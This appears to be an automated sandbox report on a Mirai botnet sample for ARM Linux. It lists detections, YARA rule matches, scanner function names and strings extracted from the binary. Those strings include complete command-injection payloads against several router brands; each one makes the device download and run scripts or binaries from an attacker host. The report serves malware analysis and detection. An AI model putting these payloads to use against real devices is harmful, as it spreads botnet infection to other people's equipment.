Linux Analysis Report
STa4J3TGC8

Overview

General Information

Sample Name: STa4J3TGC8
Analysis ID: 679616
MD5: 629225375f0931a57b3b0af8790de2e7
SHA1: 57e654779dd2c24b84a974fbf9d43e24168b32cb
SHA256: 965641bf2015ff5ead1b627e962a5f9e0c0d72f786198276e51b89fa6fd00831
Tags: 32, arm, elf, mirai

Detection

Mirai
Score: 68
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Contains symbols with names commonly found in malware
Yara signature match
Sample contains strings that are potentially command strings
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Sample and/or dropped files contains symbols with suspicious names
Sample listens on a socket
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

AV Detection

Source: STa4J3TGC8 Avira: detected
Source: STa4J3TGC8 Virustotal: Detection: 59%
Source: STa4J3TGC8 Metadefender: Detection: 34%
Source: STa4J3TGC8 ReversingLabs: Detection: 62%
Source: /tmp/STa4J3TGC8 (PID: 6233) Socket: 127.0.0.1::44455
Source: STa4J3TGC8 String found in binary or memory: http://0.0.0.0/Cloud/Cloud.x86
Source: STa4J3TGC8 String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mips;
Source: STa4J3TGC8 String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mpsl;chmod
Source: STa4J3TGC8 String found in binary or memory: http://46.23.109.47/Cloud/Cloud.x86
Source: STa4J3TGC8 String found in binary or memory: http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: STa4J3TGC8 String found in binary or memory: http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
Source: STa4J3TGC8 String found in binary or memory: http://46.23.109.47/Cloud/Gpon.sh
Source: STa4J3TGC8 String found in binary or memory: http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI
Source: STa4J3TGC8 String found in binary or memory: http://purenetworks.com/HNAP1/
Source: STa4J3TGC8 String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: STa4J3TGC8 String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

Source: ELF static info symbol of initial sample Name: attack.c
Source: ELF static info symbol of initial sample Name: attack_app_http
Source: ELF static info symbol of initial sample Name: attack_get_opt_int
Source: ELF static info symbol of initial sample Name: attack_get_opt_ip
Source: ELF static info symbol of initial sample Name: attack_get_opt_str
Source: ELF static info symbol of initial sample Name: attack_init
Source: ELF static info symbol of initial sample Name: attack_method.c
Source: ELF static info symbol of initial sample Name: attack_method_std
Source: ELF static info symbol of initial sample Name: attack_method_tcp
Source: ELF static info symbol of initial sample Name: attack_method_tcpfrag
Source: STa4J3TGC8, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: STa4J3TGC8, type: SAMPLE Matched rule: MAL_ARM_LNX_Mirai_Mar13_2022 date = 2022-03-16, hash1 = 0283b72913b8a78b2a594b2d40ebc3c873e4823299833a1ff6854421378f5a68, author = Mehmet Ali Kerimoglu a.k.a. CYB3RMX, description = Detects new ARM Mirai variant
Source: 6233.1.00007f3d50042000.00007f3d50047000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6236.1.00007f3d50042000.00007f3d50047000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6236.1.00007f3d50017000.00007f3d50039000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6233.1.00007f3d50017000.00007f3d50039000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: Initial sample Potential command found: GET /ping.cgi?pingIpAddress=google.fr;wget%20http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114'$ HTTP/1.1
Source: Initial sample Potential command found: GET /login.cgi?cli=aa%20aa%27;wget%20http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+46.23.109.47/Cloud/Jaws.sh;chmod+777+*;sh+Jaws.sh HTTP/1.1
Source: Initial sample Potential command found: GET /boaform/admin/formPing?target_addr=;wget%20http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
Source: Initial sample Potential command found: GET /index.php?s=/index/hink
Source: STa4J3TGC8 ELF static info symbol of initial sample: __gnu_unwind_execute
Source: STa4J3TGC8 ELF static info symbol of initial sample: asus_scanner_init
Source: STa4J3TGC8 ELF static info symbol of initial sample: asus_scanner_pid
Source: STa4J3TGC8 ELF static info symbol of initial sample: asus_scanner_rawpkt
Source: STa4J3TGC8 ELF static info symbol of initial sample: comtrend_scanner
Source: STa4J3TGC8 ELF static info symbol of initial sample: comtrend_scanner_pid
Source: STa4J3TGC8 ELF static info symbol of initial sample: comtrend_scanner_rawpkt
Source: STa4J3TGC8 ELF static info symbol of initial sample: dlink_scanner.c
Source: STa4J3TGC8 ELF static info symbol of initial sample: dlinkscanner_fake_time
Source: STa4J3TGC8 ELF static info symbol of initial sample: dlinkscanner_rsck
Source: STa4J3TGC8 ELF static info symbol of initial sample: dlinkscanner_scanner_init
Source: STa4J3TGC8 ELF static info symbol of initial sample: dlinkscanner_scanner_pid
Source: STa4J3TGC8 ELF static info symbol of initial sample: dlinkscanner_scanner_rawpkt
Source: STa4J3TGC8 ELF static info symbol of initial sample: dlinkscanner_setup_connection
Source: STa4J3TGC8 ELF static info symbol of initial sample: gpon443_scanner
Source: STa4J3TGC8 ELF static info symbol of initial sample: gpon443_scanner_pid
Source: STa4J3TGC8 ELF static info symbol of initial sample: gpon443_scanner_rawpkt
Source: STa4J3TGC8 ELF static info symbol of initial sample: gpon80_scanner
Source: STa4J3TGC8 ELF static info symbol of initial sample: gpon80_scanner.c
Source: STa4J3TGC8 ELF static info symbol of initial sample: gpon80_scanner_pid
Source: STa4J3TGC8 ELF static info symbol of initial sample: gpon80_scanner_rawpkt
Source: STa4J3TGC8 ELF static info symbol of initial sample: hnap_scanner.c
Source: STa4J3TGC8 ELF static info symbol of initial sample: hnapscanner_fake_time
Source: STa4J3TGC8 ELF static info symbol of initial sample: hnapscanner_rsck
Source: STa4J3TGC8 ELF static info symbol of initial sample: hnapscanner_scanner_init
Source: STa4J3TGC8 ELF static info symbol of initial sample: hnapscanner_scanner_pid
Source: STa4J3TGC8 ELF static info symbol of initial sample: hnapscanner_scanner_rawpkt
Source: STa4J3TGC8 ELF static info symbol of initial sample: hnapscanner_setup_connection
Source: STa4J3TGC8 ELF static info symbol of initial sample: huawei_scanner_pid
Source: STa4J3TGC8 ELF static info symbol of initial sample: huawei_scanner_rawpkt
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://46.23.109.47/Cloud/Cloud.mips; chmod 777 Cloud.mips; ./Cloud.mips Cloud.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0POST /HNAP1/ HTTP/1.0
Source: classification engine Classification label: mal68.troj.lin@0/0@0/0
Source: /tmp/STa4J3TGC8 (PID: 6237) Reads from proc file: /proc/stat
Source: /tmp/STa4J3TGC8 (PID: 6233) Queries kernel information via 'uname'
Source: STa4J3TGC8, 6233.1.000055f238674000.000055f2387c6000.rw-.sdmp, STa4J3TGC8, 6236.1.000055f238674000.000055f2387a2000.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/arm
Source: STa4J3TGC8, 6233.1.00007ffdb51ad000.00007ffdb51ce000.rw-.sdmp, STa4J3TGC8, 6236.1.00007ffdb51ad000.00007ffdb51ce000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/STa4J3TGC8SUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/STa4J3TGC8
Source: STa4J3TGC8, 6233.1.000055f238674000.000055f2387c6000.rw-.sdmp, STa4J3TGC8, 6236.1.000055f238674000.000055f2387a2000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: STa4J3TGC8, 6233.1.00007ffdb51ad000.00007ffdb51ce000.rw-.sdmp, STa4J3TGC8, 6236.1.00007ffdb51ad000.00007ffdb51ce000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm

Stealing of Sensitive Information

Source: Yara match File source: STa4J3TGC8, type: SAMPLE
Source: Yara match File source: 6236.1.00007f3d50017000.00007f3d50039000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6233.1.00007f3d50017000.00007f3d50039000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: STa4J3TGC8, type: SAMPLE
Source: Yara match File source: 6236.1.00007f3d50017000.00007f3d50039000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6233.1.00007f3d50017000.00007f3d50039000.r-x.sdmp, type: MEMORY
No contacted IP infos